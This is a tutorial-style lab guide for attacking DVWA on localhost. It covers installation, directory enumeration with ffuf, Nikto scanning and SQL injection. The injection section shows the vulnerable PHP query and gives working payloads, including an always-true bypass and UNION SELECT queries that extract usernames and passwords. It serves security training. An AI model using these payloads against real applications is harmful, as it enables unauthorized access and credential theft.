Web Penetration Lab Guide

#

1. Installation of DVWA

#

Installation Steps

#

1. Ensure Network Access

   • In Kali Linux, confirm that your VM is in NAT mode and has internet access. Use the following images as a guide:

     

     

2. Download the Installation Script

   • Open the terminal in your Kali VM and enter the following command to download the DVWA installation script:

     wget https://raw.githubusercontent.com/IamCarron/DVWA-Script/main/Install-DVWA.sh
     

3. Make the Script Executable

   • Change the permissions of the script to make it executable:

     chmod +x Install-DVWA.sh
     

4. Run the Script

   • Run the installation script with elevated privileges:

     sudo ./Install-DVWA.sh
     

5. Follow Prompts

   • When prompted during the installation process, simply press Enter to accept the defaults.

6. Need Help?

   • If you encounter any issues, refer to this video for guidance:
     Installation Video Guide

   

7. Verify Installation

   • Once installed, DVWA should be accessible. Test it by navigating to http://localhost/DVWA in your browser.

2. Directory Enumeration with ffuf

#

Steps for Enumeration

#

1. Download a Wordlist

   • Use a suitable wordlist for directory enumeration. The recommended wordlist is from SecLists:

     sudo apt -y install seclists
     

2. Run ffuf

   • Use ffuf to search for directories:

     ffuf -u http://localhost/DVWA/FUZZ -w /usr/share/seclists/Discovery/Web-Content/big.txt
     

     Example output:

     

     This reveals potential subdirectories under localhost/DVWA that might contain exploitable resources.

3. Present Results Neatly

   • To present the results in a more organized format, use BurpSuite:

     ffuf -u http://localhost/DVWA/FUZZ -w /usr/share/seclists/Discovery/Web-Content/big.txt -replay-proxy http://127.0.0.1:8080
     

4. Launch BurpSuite

   • If BurpSuite doesn’t start automatically, launch it manually:
     • Click the Kali Logo on the top left.
     • Search for and select BurpSuite.
     • Follow the prompts to create a new project.

   

3. Scanning with Nikto

#

Steps for Scanning

#

1. Run Nikto

   • Use the following command to scan DVWA:

     nikto -host http://localhost/DVWA
     

2. Analyze Results

   • Example output:

     

     Nikto identifies server details and potential vulnerabilities, such as missing headers (e.g., X-Content-Type-Options). These insights can guide your next steps in exploiting the system.

4. Brute Forcing Web Login

#

For guidance on brute-forcing the DVWA login page using BurpSuite, refer to this article:
Hacking into DVWA Using BurpSuite Brute Force

5. SQL Injections

#

Steps for SQL Injection

#

1. Navigate to the SQL Injection Page

   • Access the relevant page in DVWA.

2. Test with a Simple Input

   • Enter 1 into the input form and observe the results:

     

3. Inspect the Source Code

   • Click the View Source button to review the code handling the input. Example snippet:

     $id = $_REQUEST['id'];
     $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
     

4. Test a Basic Payload

   • Enter the following payload to bypass authentication:

     1' OR '1'='1' #
     

   • This works because the query always evaluates to true.

5. Extract More Data

   • To retrieve more information, use a UNION SELECT statement. For example:

     'UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name = 'users' --
     

6. Retrieve User Data

   • Extract usernames and passwords with:

     'UNION SELECT user, password FROM users --
     

Why It Works

#

• The application fails to sanitize user inputs properly, allowing attackers to manipulate the SQL query.

Use this guide responsibly and only for ethical purposes, such as penetration testing in authorized environments.